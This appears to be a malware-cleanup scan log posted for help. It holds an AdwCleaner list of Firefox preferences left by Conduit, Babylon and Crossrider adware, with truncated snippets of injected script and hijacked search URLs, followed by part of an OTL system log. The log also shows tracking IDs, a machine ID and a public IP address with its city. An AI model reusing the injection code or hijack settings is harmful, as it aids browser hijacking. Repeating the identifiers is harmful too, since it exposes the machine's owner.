Line Found : user_pref("CT2704262.2704262a129531303481232105000000paramsGK0", "{\"updateReqTime\":1352082527086,\"updateRespTime\":1352082534508,\"data\":{\"settings\":{\"icon\":\"hxxp://storage.conduit.com/62/270[...]
Line Found : user_pref("CT2704262.CT2704262ads1", "%7B%22ads%22%3A%5B%7B%22aid%22%3A%2236732%22%2C%22title%22%3A%22%u2713%20Clean%20Your%20PC%20%28Free%29%20%u2713%22%2C%22adtext1%22%3A%22Optimize%20the%20Speed%20[...]
Line Found : user_pref("CT2704262.CT2704262current_term", "");
Line Found : user_pref("CT2704262.CT2704262sdate", "4");
Line Found : user_pref("CT2704262.ENABALE_HISTORY", "{\"dataType\":\"string\",\"data\":\"true\"}");
Line Found : user_pref("CT2704262.ENABLE_RETURN_WEB_SEARCH_ON_THE_PAGE", "{\"dataType\":\"string\",\"data\":\"true\"}");
Line Found : user_pref("CT2704262.FirstTime", "true");
Line Found : user_pref("CT2704262.FirstTimeFF3", "true");
Line Found : user_pref("CT2704262.LoginRevertSettingsEnabled", true);
Line Found : user_pref("CT2704262.PrintItGreenStatus", "true");
Line Found : user_pref("CT2704262.RSS_Pub_Config", "{\"settings\":{\"icon\":\"hxxp://storage.conduit.com/62/270/CT2704262/Sharing/temp/634442642461231251_24PX.png\",\"componentId\":\"129531303481232105\",\"templat[...]
Line Found : user_pref("CT2704262.RSSapp2704262a129531303481232105000000ReadItemsArr", "%7B%22hxxp%3A%2F%2Fwww.nytimes.com%2F2012%2F11%2F05%2Fus%2Fpolitics%2Fcandidates-make-final-dash-as-race-winds-down.html%22%3[...]
Line Found : user_pref("CT2704262.RSSapp2704262a129531303481232105000000cat0", "%5B%7B%22type%22%3A%22rss%22%2C%22version%22%3A%222.0%22%2C%22title%22%3A%22NYT%20%3E%20Home%20Page%22%2C%22link%22%3A%22hxxp%3A%2F%2[...]
Line Found : user_pref("CT2704262.RSSapp2704262a129531303481232105000000cat1", "%5B%7B%22type%22%3A%22rss%22%2C%22version%22%3A%222.0%22%2C%22title%22%3A%22Yahoo!%20Eurosport%20-%20All%20Sports%22%2C%22link%22%3A%[...]
Line Found : user_pref("CT2704262.RSSapp2704262a129531303481232105000000cat2", "%5B%7B%22type%22%3A%22rss%22%2C%22version%22%3A%222.0%22%2C%22title%22%3A%22People.com%20Latest%20News%22%2C%22link%22%3A%22hxxp%3A%2[...]
Line Found : user_pref("CT2704262.RSSapp2704262a129531303481232105000000embeddedVersion", "2.5.0");
Line Found : user_pref("CT2704262.RSSapp2704262a129531303481232105000000feedsObj", "%7B%22channels%22%3A%7B%22id%22%3A%22channels%22%2C%22type%22%3A%22rss%22%2C%22data%22%3A%7B%22categories%22%3A%5B%7B%22title%22%[...]
Line Found : user_pref("CT2704262.RSSapp2704262a129531303481232105000000lastReportTime", "1352082629643 ");
Line Found : user_pref("CT2704262.RSSapp2704262a129531303481232105000000newFeeds", "newFeeds");
Line Found : user_pref("CT2704262.RevertSettingsEnabled", false);
Line Found : user_pref("CT2704262.UserID", "UN27902223334792019");
Line Found : user_pref("CT2704262.addressBarTakeOverEnabledInHidden", "true");
Line Found : user_pref("CT2704262.autoDisableScopes", -1);
Line Found : user_pref("CT2704262.cb_experience_000", "348");
Line Found : user_pref("CT2704262.cb_firstuse0100", "1");
Line Found : user_pref("CT2704262.cbcountry_001", "US");
Line Found : user_pref("CT2704262.cbfirsttime", "Fri Jun 29 2012 14:26:13 GMT-0400 (Eastern Daylight Time)");
Line Found : user_pref("CT2704262.countryCode", "US");
Line Found : user_pref("CT2704262.defaultSearch", "false");
Line Found : user_pref("CT2704262.enableAlerts", "false");
Line Found : user_pref("CT2704262.enableFix404ByUser", "TRUE");
Line Found : user_pref("CT2704262.enableSearchFromAddressBar", "true");
Line Found : user_pref("CT2704262.firstTimeDialogOpened", "true");
Line Found : user_pref("CT2704262.fixPageNotFoundError", "true");
Line Found : user_pref("CT2704262.fixPageNotFoundErrorByUser", "true");
Line Found : user_pref("CT2704262.fixPageNotFoundErrorInHidden", "true");
Line Found : user_pref("CT2704262.fixUrls", true);
Line Found : user_pref("CT2704262.fullUserID", "UN27902223334792019.UP.20130625134306");
Line Found : user_pref("CT2704262.homepageuserchanged", true);
Line Found : user_pref("CT2704262.hxxp___cdn_printitgreen_com.APP_WIN_FEATURES", "resizable=no,hscroll=no,vscroll=no,savelocation=no,saveresizedsize=no,closebutton=no,openposition=center");
Line Found : user_pref("CT2704262.installId", "ConduitNSISIntegration");
Line Found : user_pref("CT2704262.installType", "ConduitNSISIntegration");
Line Found : user_pref("CT2704262.isCheckedStartAsHidden", true);
Line Found : user_pref("CT2704262.isEnableAllDialogs", "{\"dataType\":\"string\",\"data\":\"true\"}");
Line Found : user_pref("CT2704262.isFirstTimeToolbarLoading", "false");
Line Found : user_pref("CT2704262.isNewTabEnabled", false);
Line Found : user_pref("CT2704262.isPerformedSmartBarTransition", "true");
Line Found : user_pref("CT2704262.isToolbarShrinked", "{\"dataType\":\"string\",\"data\":\"false\"}");
Line Found : user_pref("CT2704262.lastNewTabSettings", "{\"isEnabled\":false,\"newTabUrl\":\"hxxp://search.conduit.com/?ctid=CT2704262&octid=CT2704262&SearchSource=15&CUI=UN27902223334792019&SSPV=&Lay=1&UM=\"}");
Line Found : user_pref("CT2704262.lastVersion", "10.23.0.822");
Line Found : user_pref("CT2704262.migrateAppsAndComponents", true);
Line Found : user_pref("CT2704262.navigationAliasesJson", "{\"EB_SEARCH_TERM\":\"\",\"EB_MAIN_FRAME_URL\":\"hxxp%3A%2F%2Fwww.geekstogo.com%2Fforum%2Ftopic%2F336443-getting-hit-with-rbvjobfindgoldinfo%2Fpage__pid__[...]
Line Found : user_pref("CT2704262.openThankYouPage", "false");
Line Found : user_pref("CT2704262.openUninstallPage", "true");
Line Found : user_pref("CT2704262.search.searchAppId", "129234816889425546");
Line Found : user_pref("CT2704262.search.searchCount", "0");
Line Found : user_pref("CT2704262.searchInNewTabEnabled", "false");
Line Found : user_pref("CT2704262.searchInNewTabEnabledByUser", "false");
Line Found : user_pref("CT2704262.searchInNewTabEnabledInHidden", "true");
Line Found : user_pref("CT2704262.searchSuggestEnabledByUser", "false");
Line Found : user_pref("CT2704262.selectToSearchBoxEnabled", "{\"dataType\":\"string\",\"data\":\"true\"}");
Line Found : user_pref("CT2704262.serviceLayer_service_login_isFirstLoginInvoked", "{\"dataType\":\"boolean\",\"data\":\"true\"}");
Line Found : user_pref("CT2704262.serviceLayer_service_login_loginCount", "{\"dataType\":\"number\",\"data\":\"4\"}");
Line Found : user_pref("CT2704262.serviceLayer_service_toolbarGrouping_activeCTID", "{\"dataType\":\"string\",\"data\":\"CT2704262\"}");
Line Found : user_pref("CT2704262.serviceLayer_service_toolbarGrouping_activeDownloadUrl", "{\"dataType\":\"string\",\"data\":\"hxxp://FreeSoundRecorder.MyRadioToolbar.com//xpi\"}");
Line Found : user_pref("CT2704262.serviceLayer_service_toolbarGrouping_activeToolbarName", "{\"dataType\":\"string\",\"data\":\"FreeSoundRecorder \"}");
Line Found : user_pref("CT2704262.serviceLayer_service_toolbarGrouping_invoked", "{\"dataType\":\"string\",\"data\":\"true\"}");
Line Found : user_pref("CT2704262.serviceLayer_service_usage_toolbarUsageCount", "{\"dataType\":\"number\",\"data\":\"2\"}");
Line Found : user_pref("CT2704262.serviceLayer_services_Configuration_lastUpdate", "1389822317001");
Line Found : user_pref("CT2704262.serviceLayer_services_app.twitter.user-cnet_lastUpdate", "1352082655917");
Line Found : user_pref("CT2704262.serviceLayer_services_app.twitter.user-cnnbrk_lastUpdate", "1352082656346");
Line Found : user_pref("CT2704262.serviceLayer_services_app.twitter.user-computeractive_lastUpdate", "1352082656518");
Line Found : user_pref("CT2704262.serviceLayer_services_app.twitter.user-dailymirror_lastUpdate", "1352082656803");
Line Found : user_pref("CT2704262.serviceLayer_services_app.twitter.user-google_lastUpdate", "1352082656101");
Line Found : user_pref("CT2704262.serviceLayer_services_app.twitter.user-techcrunch_lastUpdate", "1352082655713");
Line Found : user_pref("CT2704262.serviceLayer_services_app.twitter.user-time_lastUpdate", "1352082656987");
Line Found : user_pref("CT2704262.serviceLayer_services_app.twitter.user-wired_lastUpdate", "1352082656771");
Line Found : user_pref("CT2704262.serviceLayer_services_appTrackingFirstTime_lastUpdate", "1352073607563");
Line Found : user_pref("CT2704262.serviceLayer_services_appTracking_lastUpdate", "1340994352813");
Line Found : user_pref("CT2704262.serviceLayer_services_appsMetadata_lastUpdate", "1352073339936");
Line Found : user_pref("CT2704262.serviceLayer_services_gottenAppsContextMenu_lastUpdate", "1352073607630");
Line Found : user_pref("CT2704262.serviceLayer_services_location_lastUpdate", "1372103360811");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.10.20.14_lastUpdate", "1345584630516");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.10.27.6_lastUpdate", "1352675487174");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.10.6.6_lastUpdate", "1340994390917");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.13.40.15_lastUpdate", "1359413905557");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.14.42.7_lastUpdate", "1360846082964");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.14.65.43_lastUpdate", "1364160224005");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.15.0.562_lastUpdate", "1367240825821");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.15.2.523_lastUpdate", "1372122389841");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.16.4.519_lastUpdate", "1374629797861");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.16.70.505_lastUpdate", "1377542157150");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.19.2.505_lastUpdate", "1378832743117");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.20.0.513_lastUpdate", "1380512287663");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.20.1.508_lastUpdate", "1381898326039");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.21.1.507_lastUpdate", "1384532156442");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.22.3.518_lastUpdate", "1385230283162");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.22.5.510_lastUpdate", "1386946817072");
Line Found : user_pref("CT2704262.serviceLayer_services_login_10.23.0.822_lastUpdate", "1389822316778");
Line Found : user_pref("CT2704262.serviceLayer_services_optimizer_lastUpdate", "1352073341927");
Line Found : user_pref("CT2704262.serviceLayer_services_otherAppsContextMenu_lastUpdate", "1352073607673");
Line Found : user_pref("CT2704262.serviceLayer_services_searchAPI_lastUpdate", "1389822316997");
Line Found : user_pref("CT2704262.serviceLayer_services_serviceMap_lastUpdate", "1389822316900");
Line Found : user_pref("CT2704262.serviceLayer_services_toolbarContextMenu_lastUpdate", "1352073607569");
Line Found : user_pref("CT2704262.serviceLayer_services_toolbarSettings_lastUpdate", "1389822316985");
Line Found : user_pref("CT2704262.serviceLayer_services_translation_lastUpdate", "1389822316915");
Line Found : user_pref("CT2704262.settingsINI", true);
Line Found : user_pref("CT2704262.shouldFirstTimeDialog", "false");
Line Found : user_pref("CT2704262.showToolbarPermission", "false");
Line Found : user_pref("CT2704262.smartbar.CTID", "CT2704262");
Line Found : user_pref("CT2704262.smartbar.Uninstall", "0");
Line Found : user_pref("CT2704262.smartbar.isHidden", true);
Line Found : user_pref("CT2704262.smartbar.toolbarName", "FreeSoundRecorder ");
Line Found : user_pref("CT2704262.startPage", "false");
Line Found : user_pref("CT2704262.toolbarBornServerTime", "29-6-2012");
Line Found : user_pref("CT2704262.toolbarCurrentServerTime", "15-1-2014");
Line Found : user_pref("CT2704262.toolbarLoginClientTime", "Sun Mar 24 2013 19:27:21 GMT-0500 (Eastern Standard Time)");
Line Found : user_pref("CT2704262.upgradeFromClearSBVersion", true);
Line Found : user_pref("CT2704262.url_history0001", "hxxp://www.pathalerts.com/alertsignup.aspx:::clickhandler:::1352682056999,,,hxxp://www.pathalerts.com/alertsignup.aspx:::clickhandler:::1352682057000,,,hxxp://w[...]
Line Found : user_pref("CT2704262_Firefox.csv", "[{\"from\":\"Abs Layer\",\"action\":\"loading toolbar\",\"time\":1389822308467,\"isWithState\":\"\",\"timeFromStart\":0,\"timeFromPrev\":0}]");
Line Found : user_pref("CT3286042.UserID", "UN23501075292133711");
Line Found : user_pref("CT3286042.fullUserID", "UN23501075292133711.IN.20131020190256");
Line Found : user_pref("browser.babylon.HPOnNewTab", "search.babylon.com");
Line Found : user_pref("browser.search.order.1", "Search Results");
Line Found : user_pref("extensions.BabylonToolbar_i.aflt", "babsst");
Line Found : user_pref("extensions.BabylonToolbar_i.babExt", "");
Line Found : user_pref("extensions.BabylonToolbar_i.babTrack", "affID=109935&tt=100512_4_");
Line Found : user_pref("extensions.BabylonToolbar_i.hardId", "44ddbf050000000000000016cf6b0602");
Line Found : user_pref("extensions.BabylonToolbar_i.id", "44ddbf050000000000000016cf6b0602");
Line Found : user_pref("extensions.BabylonToolbar_i.instlDay", "15478");
Line Found : user_pref("extensions.BabylonToolbar_i.instlRef", "sst");
Line Found : user_pref("extensions.BabylonToolbar_i.newTab", true);
Line Found : user_pref("extensions.BabylonToolbar_i.newTabUrl", "hxxp://search.babylon.com/?affID=109935&tt=100512_4_&babsrc=NT_ss&mntrId=44ddbf050000000000000016cf6b0602");
Line Found : user_pref("extensions.BabylonToolbar_i.prdct", "BabylonToolbar");
Line Found : user_pref("extensions.BabylonToolbar_i.prtnrId", "babylon");
Line Found : user_pref("extensions.BabylonToolbar_i.smplGrp", "none");
Line Found : user_pref("extensions.BabylonToolbar_i.srcExt", "ss");
Line Found : user_pref("extensions.BabylonToolbar_i.tlbrId", "tb9");
Line Found : user_pref("extensions.BabylonToolbar_i.vrsn", "1.5.3.17");
Line Found : user_pref("extensions.BabylonToolbar_i.vrsnTs", "1.5.3.1718:51:51");
Line Found : user_pref("extensions.BabylonToolbar_i.vrsni", "1.5.3.17");
Line Found : user_pref("extensions.VWM.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self==window.top){var script=document.createElement('script');script.type=[...]
Line Found : user_pref("extensions.crossrider.bic", "1377a4e50a4ade643a7bd947a2af9ed4");
Line Found : user_pref("extensions.crossriderapp2258.2258.InstallationThankYouPage", true);
Line Found : user_pref("extensions.crossriderapp2258.2258.InstallationTime", 1337733227);
Line Found : user_pref("extensions.crossriderapp2258.2258.InstallationUserSettings.searchUserConifrmation", false);
Line Found : user_pref("extensions.crossriderapp2258.2258.InstallationUserSettings.setHomepage", false);
Line Found : user_pref("extensions.crossriderapp2258.2258.InstallationUserSettings.setNewTab", false);
Line Found : user_pref("extensions.crossriderapp2258.2258.InstallationUserSettings.setSearch", false);
Line Found : user_pref("extensions.crossriderapp2258.2258.active", true);
Line Found : user_pref("extensions.crossriderapp2258.2258.addressbar", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.affid", "0");
Line Found : user_pref("extensions.crossriderapp2258.2258.backgroundjs", "\n\n_GPL_PID = 21;\nfunction parse_url(a,f){for(var b=\"source scheme authority userInfo user pass host port relative path directory file q[...]
Line Found : user_pref("extensions.crossriderapp2258.2258.backgroundver", 10);
Line Found : user_pref("extensions.crossriderapp2258.2258.can_run_bg_code", true);
Line Found : user_pref("extensions.crossriderapp2258.2258.certdomaininstaller", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.changeprevious", false);
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie.InstallationTime.expiration", "Fri Feb 01 2030 00:00:00 GMT-0500 (Eastern Standard Time)");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie.InstallationTime.value", "1337733227");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie.InstallerParams.expiration", "Fri Feb 01 2030 00:00:00 GMT-0500 (Eastern Standard Time)");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_aoi.expiration", "Fri Feb 01 2030 00:00:00 GMT-0500 (Eastern Standard Time)");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_aoi.value", "1337733227");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_crr.expiration", "Fri Feb 01 2030 00:00:00 GMT-0500 (Eastern Standard Time)");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_crr.value", "1341000674");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_geo.expiration", "Wed Jul 04 2012 20:49:05 GMT-0400 (Eastern Daylight Time)");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_geo.value", "%7B%22geoplugin_request%22%3A%22173.63.74.150%22%2C%22geoplugin_status%22%3A200%2C%22geoplugin_city%22%3A%22Caldwell%22%2C%22geopl[...]
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_hotfix20111102645.expiration", "Fri Feb 01 2030 00:00:00 GMT-0500 (Eastern Standard Time)");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_hotfix20111102645.value", "%221%22");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_installer_params.expiration", "Fri Feb 01 2030 00:00:00 GMT-0500 (Eastern Standard Time)");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_installer_params.value", "%7B%22source_id%22%3A%2222241%22%2C%22sub_id%22%3A%22default%22%2C%22uzid%22%3A%2222241%26subid%3D%26pid%3D1145%22%7D[...]
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_parent_zoneid.expiration", "Fri Feb 01 2030 00:00:00 GMT-0500 (Eastern Standard Time)");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_parent_zoneid.value", "%2222241%22");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_product_id.expiration", "Fri Feb 01 2030 00:00:00 GMT-0500 (Eastern Standard Time)");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_product_id.value", "%221145%22");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_sr[bearshare.com].expiration", "Sat Jun 30 2012 15:07:48 GMT-0400 (Eastern Daylight Time)");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_sr[bearshare.com].value", "1340996868");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_zoneid.expiration", "Fri Feb 01 2030 00:00:00 GMT-0500 (Eastern Standard Time)");
Line Found : user_pref("extensions.crossriderapp2258.2258.cookie._GPL_zoneid.value", "%2238957%22");
Line Found : user_pref("extensions.crossriderapp2258.2258.description", "I Want This!");
Line Found : user_pref("extensions.crossriderapp2258.2258.domain", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.emailsig", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.enablesearch", false);
Line Found : user_pref("extensions.crossriderapp2258.2258.exposesites", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.fbremoteurl", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.group", 0);
Line Found : user_pref("extensions.crossriderapp2258.2258.homepage", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.iframe", false);
Line Found : user_pref("extensions.crossriderapp2258.2258.js", "\n\nvar _GPL_PID=21;\nArray.prototype.indexOf||(Array.prototype.indexOf=function(a){if(void 0===this||null===this)throw new TypeError;var b=Object(th[...]
Line Found : user_pref("extensions.crossriderapp2258.2258.manifesturl", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.name", "I Want This");
Line Found : user_pref("extensions.crossriderapp2258.2258.newtab", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.opensearch", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_13.code", "(function©{c.selectedText=function(e,a){function d(){if(window.getSelection)return window.getSelection();if(document.getSelecti[...]
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_13.name", "CrossriderAppUtils");
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_13.ver", 1);
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_14.code", "\"undefined\"===typeof appAPI&&(appAPI={});appAPI.JSON={};\n(function(){function a(a){return 10>a?\"0\"+a:a}function b(a){g.lastI[...]
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_14.name", "CrossriderUtils");
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_14.ver", 1);
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_15.code", "(function(e){function u(c,b){for(css_prop in b)b.hasOwnProperty(css_prop)&&(c.style[css_prop]=b[css_prop])}function q(c,b){var c=[...]
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_15.name", "FacebookFFIE");
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_15.ver", 1);
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_16.code", "(function(b,a){function h(){var c=\"\";return c=document.defaultView.top==document.defaultView?b.getTabID(document):b.getTabID(do[...]
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_16.name", "FFAppAPIWrapper");
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_16.ver", 3);
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_17.code", "var $$jquery;\n(function(l,n){function X(){if(!c.isReady){try{k.documentElement.doScroll(\"left\")}catch(a){setTimeout(X,1);retur[...]
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_17.name", "jQuery");
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins.plugin_17.ver", 1);
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins_lists.plugins_0", "17,14,16");
Line Found : user_pref("extensions.crossriderapp2258.2258.plugins_lists.plugins_1", "17,14,13,16,15");
Line Found : user_pref("extensions.crossriderapp2258.2258.pluginsurl", "hxxp://app-static.crossrider.com/plugin/apps/2258/plugins/081/ff/plugins.json");
Line Found : user_pref("extensions.crossriderapp2258.2258.pluginsversion", 4);
Line Found : user_pref("extensions.crossriderapp2258.2258.premium", true);
Line Found : user_pref("extensions.crossriderapp2258.2258.publisher", "215 Apps");
Line Found : user_pref("extensions.crossriderapp2258.2258.searchstatus", 0);
Line Found : user_pref("extensions.crossriderapp2258.2258.setnewtab", false);
Line Found : user_pref("extensions.crossriderapp2258.2258.settingsurl", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.thankyou", "");
Line Found : user_pref("extensions.crossriderapp2258.2258.updateinterval", 360);
Line Found : user_pref("extensions.crossriderapp2258.2258.ver", 60);
Line Found : user_pref("extensions.crossriderapp2258.adsOldValue", -1);
Line Found : user_pref("extensions.crossriderapp2258.apps", "2258");
Line Found : user_pref("extensions.crossriderapp2258.bic", "1377a4e50a4ade643a7bd947a2af9ed4");
Line Found : user_pref("extensions.crossriderapp2258.cid", 2258);
Line Found : user_pref("extensions.crossriderapp2258.firstrun", false);
Line Found : user_pref("extensions.crossriderapp2258.hadappinstalled", true);
Line Found : user_pref("extensions.crossriderapp2258.installationdate", 1337786782);
Line Found : user_pref("extensions.crossriderapp2258.lastcheck", 22349941);
Line Found : user_pref("extensions.crossriderapp2258.lastcheckitem", 22350013);
Line Found : user_pref("extensions.crossriderapp2258.misc.lastBgWorkerTimer", "1340737262067");
Line Found : user_pref("extensions.crossriderapp2258.misc.lastDomWorkerTimer", "1340737262061");
Line Found : user_pref("keyword.URL", "hxxp://dts.search-results.com/sr?src=ffb&gct=ds&appid=157&systemid=406&apn_dtid=BND406&apn_ptnrs=AG6&apn_uid=2424443961124536&o=APN10645&q=");
Line Found : user_pref("plugin.state.npconduitfirefoxplugin", 2);
Line Found : user_pref("smartbar.machineId", "AFRASSM/M0IMKZVSSFXJUMF3DBXFEBBDHNTCEIH27INRI2NDCTM4QFROWGX5CEXPQOZSA7YMUR7LRZ7TCMGUNW");
Line Found : user_pref("valueApps.CT2704262.mam_gk_currentVersion", "312E31322E302E35");
Line Found : user_pref("valueApps.CT2704262.mam_gk_currentVersion.storedInFile", false);
Line Found : user_pref("valueApps.CT2704262.mam_gk_globalKeysMigratedToLocalStorage", "31");
Line Found : user_pref("valueApps.CT2704262.mam_gk_globalKeysMigratedToLocalStorage.storedInFile", false);
Line Found : user_pref("valueApps.CT2704262.mam_gk_migrated_from_ls", "31");
Line Found : user_pref("valueApps.CT2704262.mam_gk_migrated_from_ls.storedInFile", false);

-\\ Google Chrome v

[ File : C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [38131 octets] - [15/01/2014 16:53:55]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [38192 octets] ##########


OTL logfile created on: 1/16/2014 6:34:45 PM - Run 5
OTL by OldTimer - Version 3.2.53.0 Folder = C:\Documents and Settings\Administrator\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1014.11 Mb Total Physical Memory | 569.01 Mb Available Physical Memory | 56.11% Memory free
2.89 Gb Paging File | 2.58 Gb Available in Paging File | 89.23% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 74.53 Gb Total Space | 52.97 Gb Free Space | 71.07% Space Free | Partition Type: NTFS
Unable to calculate disk information.

Computer Name: LATITUDED620 | User Name: Administrator | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/10/09 09:58:16 | 003,275,136 | ---- | M] (Skype Technologies S.A.) -- C:\Documents and Settings\All Users\Application Data\Skype\Toolbars\Skype C2C Service\c2c_service.exe
PRC - [2013/03/06 18:44:41 | 000,069,792 | ---- | M] (Absolute Software Corp.) -- C:\WINDOWS\system32\rpcnet.exe
PRC - [2012/06/30 11:46:07 | 000,596,992 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Administrator\Desktop\OTL.exe
PRC - [2012/03/26 16:08:12 | 000,931,200 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Security Client\msseces.exe
PRC - [2012/03/26 16:03:40 | 000,011,552 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft Security Client\MsMpEng.exe
PRC - [2008/04/14 07:00:00 | 001,033,728 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2007/01/30 11:02:00 | 000,303,104 | ---- | M] (FUJIFILM Corporation) -- C:\Program Files\FinePixViewer\QuickDCF2.exe


========== Modules (No Company Name) ==========

MOD - [2010/10/29 09:14:44 | 000,143,360 | ---- | M] () -- C:\WINDOWS\system32\preflib.dll
MOD - [2010/10/29 09:14:12 | 000,761,856 | ---- | M] () -- C:\WINDOWS\system32\bcm1xsup.dll
MOD - [2008/04/14 07:00:00 | 000,059,904 | ---- | M] () -- C:\WINDOWS\system32\devenum.dll
MOD - [2008/04/14 07:00:00 | 000,014,336 | ---- | M] () -- C:\WINDOWS\system32\msdmo.dll
MOD - [2007/02/16 19:01:00 | 000,081,920 | ---- | M] () -- C:\Program Files\FinePixViewer\wia_register_event.dll


========== Win32 Services (SafeList) ==========

SRV - File not found [Disabled | Stopped] -- %SystemRoot%\System32\hidserv.dll -- (HidServ)
SRV - [2013/12/11 15:23:08 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2013/12/10 22:41:58 | 000,257,416 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2013/10/09 09:58:16 | 003,275,136 | ---- | M] (Skype Technologies S.A.) [Auto | Running] -- C:\Documents and Settings\All Users\Application Data\Skype\Toolbars\Skype C2C Service\c2c_service.exe -- (Skype C2C Service)
SRV - [2013/03/06 18:44:41 | 000,069,792 | ---- | M] (Absolute Software Corp.) [Auto | Running] -- C:\WINDOWS\system32\rpcnet.exe -- (rpcnet) Remote Procedure Call (RPC)
SRV - [2013/02/28 18:45:16 | 000,161,384 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2012/03/26 16:03:40 | 000,011,552 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV - [2004/09/29 11:14:36 | 000,069,632 | ---- | M] (HP) [Auto | Stopped] -- C:\WINDOWS\system32\HPZipm12.exe -- (Pml Driver HPZ12)


========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- -- (WDICA)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRELI)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDCOMP)
DRV - File not found [Kernel | System | Stopped] -- -- (PCIDump)
DRV - File not found [Kernel | System | Stopped] -- -- (lbrtfdc)
DRV - File not found [Kernel | System | Stopped] -- -- (i2omgmt)
DRV - File not found [Kernel | System | Stopped] -- -- (Changer)
